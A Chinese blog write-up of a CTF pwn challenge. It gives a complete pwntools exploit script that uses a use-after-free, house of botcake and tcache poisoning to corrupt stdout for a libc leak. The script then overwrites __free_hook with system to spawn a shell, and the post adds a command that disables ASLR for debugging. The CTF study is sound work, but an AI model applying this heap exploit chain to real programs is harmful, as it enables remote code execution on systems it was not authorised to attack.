Magic_Book(stdout泄露地址)

已于 2022-11-05 18:26:28 修改
阅读量191 收藏 1
点赞数 1
分类专栏: DASCTF X GFCTF 2022十月挑战赛 pwn复现 文章标签: 网络安全
于 2022-11-03 19:37:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FUCKING12/article/details/127676255
版权

请添加图片描述
这题没有show,edit,但是有个uaf。
因为我们没有show函数无法泄露地址,所以我们需要打stdout来泄露地址。

参考代码:

from pwn import *
context.update(os='linux',arch='amd64',log_level='debug')
#c=remote(b'node4.buuoj.cn',25937)
# c=process(b'./pwn1')
libc=ELF(b'/pwn/libc')


#def dbg():
#	gdb.attach(c,'''


#	b *$rebase(0x14a1)
#	b *$rebase(0x14f9)
#	b *$rebase(0x15d7)
#	b *$rebase(0x1684)
#
#
#	''')
def dbg():
    gdb.attach(c)
    pause()


def add(size,content):
	c.sendlineafter(b'choice : ',b'1')
	c.sendafter(b'Size: ',str(size))
	c.sendafter(b'Content: ',content)
	
	
	
	
def free(idx):
	c.sendlineafter(b'choice : ',b'2')
	c.sendlineafter(b'dex: ',str(idx))
	
	
def luck_free(idx):
	c.sendlineafter(b'choice : ',b'9')
	c.sendlineafter(b'dex: ',str(idx))
	

def run():
	
###### house of botcake	
	
	for i in range(7):
		add(0x80,b'a')	#0-6


	add(0x80,b'a')	#7
	add(0x80,b'a')	#8
	add(0x80,b'a')	#9


	for i in range(7):
		free(i)



	luck_free(8)
	free(7)
	add(0x80,b'a')	#10
	free(8)


###### 

	add(0x50,p16(0x2690))	#11,_IO_2_1_stderr-0x43+0x10 p16(0x266d)
	# dbg()

	py=b'a'*0x20+p64(0)+p64(0x91)+p16(0xf690)#p16(0xc690)
	add(0x40,py)	#12

	# dbg()

	add(0x80,b'a')	#13
	add(0x80,b'a')	#14
	# dbg()

	add(0x80,b'a'*0x10+p64(0xfbad1800)+p64(0)*3+b'\x00')	#15
	# dbg()


	libc_base=u64(c.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['_IO_2_1_stdin_']

	log.success("libc_base="+hex(libc_base))



######
	# dbg()

	free(13)
	free(12)
	# dbg()

	free_hook=libc_base+libc.sym['__free_hook']
	sys=libc_base+libc.sym['system']
	log.success("system="+hex(sys))

	add(0x40,b'a'*0x20+p64(0)+p64(0x91)+p64(free_hook))	#16
	# dbg()

	add(0x80,b'/bin/sh\x00')	#17
	add(0x80,p64(sys))	#18
	# dbg()

	free(17)
	# dbg()

	c.interactive()

# if __name__=='__main__':
# 	while True:
# 		# c=process('./pwn1')
# 		c=remote('node4.buuoj.cn',28264)
# 		try:
# 			run()
# 		except:
# 			c.close()
run()

首先我们想把本地的随机化关了,好调试。

echo 0 > /proc/sys/kernel/randomize_va_space

	for i in range(7):
		add(0x80,b'a')	#0-6


	add(0x80,b'a')	#7
	add(0x80,b'a')	#8
	add(0x80,b'a')	#9


	for i in range(7):
		free(i)



	luck_free(8)
	free(7)
	add(0x80,b'a')	#10
	free(8)

这几行代码的效果是:
请添加图片描述
箭头所指的chunk在tcachebins和unsortedbin里面,同时unsortdbin里面还有main_arena+96的地址和堆地址,我们可以利用这2个残余地址来爆破stdout。
残留数据
通过0x55555555f710地址处的chunk堆块重叠,来利用。

	add(0x50,p16(0x2690))	#11,_IO_2_1_stderr-0x43+0x10 p16(0x266d)
	# dbg()

	py=b'a'*0x20+p64(0)+p64(0x91)+p16(0xd690)#p16(0xc690)
	add(0x40,py)	#12

	# dbg()

	add(0x80,b'a')	#13
	add(0x80,b'a')	#14
	# dbg()

	add(0x80,b'a'*0x10+p64(0xfbad1800)+p64(0)*3+b'\x00')	#15

这几行代码就是打stdout。
请添加图片描述
tcachebins是不检查你的size的,所以可以随便利用其分配到你想要的地址去。
首先是分别改了这2处的2字节,这么改的目的是:可以将chunk分配到stdout附近,然后就可以修改stdout里面的数据,来泄露地址。因为linux是0x1000对齐的(页对齐)所以偏移是不变的(个人理解)
请添加图片描述
泄露完地址后就是利用很常规的free_hook劫持,最后拿到shell。
请添加图片描述

thna0s
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
De1ctf收获:用_IO_2_1_stdout_泄露libc地址 weapon的writeup
哒君的博客
08-11 1543
GitHub 例行公事 可以看出保护全开 进行分析 可以发现程序功能很简单 create delete rename create 限定大小最大只能是0x60 index只能是0-9但是是自个输入的 存在一个结构,struct[0] = size,struct[1] = ptr readn函数没有用\x00截断 delete 中间index的判断有问题,且存在uaf ren...
nsctf_online_2019_pwn1(劫持IO_2_1_stdout泄露地址)
seaaseesa的博客
04-30 1313
nsctf_online_2019_pwn1 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Edit功能里存在一个null off by one漏洞 没有show功能 我们可以利用fastbin attack,修改IO_2_1_stdout的_IO_write_base,这样,当再次调用puts或printf的时候,就会泄露出_IO_write_base~_IO_...
堆技巧 数组反向越界泄露地址
tbsqigongzi的博客
09-02 297
痛苦痛苦痛苦,调了半天才找到数组起始地址,还是自己太菜了,好好记录一下这题题目给了libc,2.31的题嗯,可以考虑覆盖got表或者hook函数打开ida发现是c++的题,认真分析一下。
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
最新发布
m0_73756460的博客
07-10 229
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
Double Free浅析(泄露地址的一种方法)
omnispace的博客
04-18 7202
Double Free其实就是同一个指针free两次。虽然一般把它叫做double free。其实只要是free一个指向堆内存的指针都有可能产生可以利用的漏洞。double free的原理其实和堆溢出的原理差不多,都是通过unlink这个双向链表删除的宏来利用的。只是double free需要由自己来伪造整个chunk并且欺骗操作系统所以好像和普通的堆溢出伪造chunk然后free触发unlink...
standard-output-redirect.zip_redirect_stdout_stdout redirect_重定向
09-21
通常,这可以通过调用`freopen()`函数来实现,但是这种方法可能受到一些限制,比如在某些情况下可能会导致资源泄露或无法满足特定的需求。 描述中提到的方法可能提供了一种更灵活的替代方案,它可能允许开发者在不...
Redirect-Input-and-Output-windows.rar_Inherited_stdout redirect
09-24
It uses the inherited handles for STDIN and STDOUT to access the pipe created by the parent. The parent process reads from its input file and writes the information to a pipe. The child receives text...
STD_stdout_
10-02
标题“STD_stdout_”暗示了我们正在处理一个与标准输出(stdout)相关的程序或脚本,可能用于计算某种标准偏差(STD)。在这个上下文中,它可能是关于精密定位服务(PPP)的精度评估,通过比较PPP(Precise Point ...
Proj3_Result_stdout_multiply_simple_
10-03
Running of this program is provided with output to the standard stdout stream result of multiplying of 2 numbers
ansible_stdout_compact_logger:Ansible Stdout紧凑型记录仪
01-31
Ansible Stdout紧凑型记录仪 安装 放在磁盘上的某个地方 在您的ansible配置的[defaults]设置中添加callback_plugins设置 将stdout_callback更改为anstomlog cf ansible.cfg 。 产品特点 单行显示 兼容pylint...
ycb2020babypwn(unsortedbin爆破stdout泄露)
qq_33590156的博客
12-04 342
题目没有leak函数,肯定得打stdout,但是又是个2.23,有指针没清零的漏洞 在stdout-0x43的地方有0x7f的size,而且和main_arena+88很近,最后三位固定是0x5dd,所以需要爆破第二个字节的高位,概率是1/16。这应该是没leak的通用打法 然后题目是通过double free,控制堆块,修改size进unsortedbin,然后爆破fd,申请出stdout泄露libc,最后打malloc_hook和realloc去getshell。 操作 首先肯定是double free
linux内核泄露地址的方式
inquisiter
09-16 464
早些的时候可以利用dmesg通过缺页错误来泄露内核地址,但新一点的内核把这个修复了。最近看了下,遇到了目前常用的方式,详细分析下。 shmat 大部分搜到的记录是利用 struct shm_file_data { int id; struct ipc_namespace *ns; struct file *file; const struct vm_operations_struct *vm_ops; }; #define shm_file_data(file) (*((st
【BUUCTF】roarctf_2019_realloc_magic---从一道题认识realloc函数+stdout泄露libc地址实战
Assassin
09-18 1896
realloc好题
【八芒星计划】 劫持_IO_2_1_stdout_泄露libc
carol2358的博客
09-02 1066
这一篇讲劫持_IO_2_1_stdout_泄露libc,应用在没有show的heap题里,首先申明,所有的都需要爆破,并且2.27由于tcache的存在使得2.27的劫持_IO_2_1_stdout_比2.23简单 文章目录CISCN2020 easyboxsmaj CISCN2020 easyboxs libc2.23 off by one+劫持_IO_2_1_stdout_ 有add和free add(0, 0x18, 'a') add(1, 0xf8, 'a') add(2, 0x68, 'a'
BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc)
weixin_44145820的博客
04-17 1876
目录题目分析漏洞利用Exp 题目分析 free没有限制,可以多次free 使用realloc进行内存分配,没有限制大小 realloc的几个特殊用法(摘自官方WP) size == 0 ,这个时候等同于free realloc_ptr == 0 && size > 0 , 这个时候等同于malloc malloc_usable_size(realloc_ptr) &g...
RCTF - Exploitation 200 welpwn - writeup
HiTaQini
12-02 2899
RCTF 2015 welpwn 200 linux 64位 栈溢出 ROP + leak libc
泄漏地址总结(Dynelf & LibcSearcher)
weixin_44319142的博客
04-16 2605
Dynelf泄漏modeul 32位 p = process('./xxx') def leak(address): #address指要泄露地址 #各种预处理 payload = "xxxxxxxx" + address + "xxxxxxxx" p.send(payload) #各种处理 data = p.recv(4) log.debug("%#x => %...
2016 Seccon tinypad
yms0211的博客
09-26 402
house of Einherjar练习题
sys.__stdout__
05-26
`sys.__stdout__` 是 Python 内置模块 `sys` 中的一个文件对象,它表示标准输出流(stdout)。在 Python 程序中,我们通常通过 `print` 语句将输出信息打印到标准输出流中,也就是默认情况下输出到控制台。如果我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值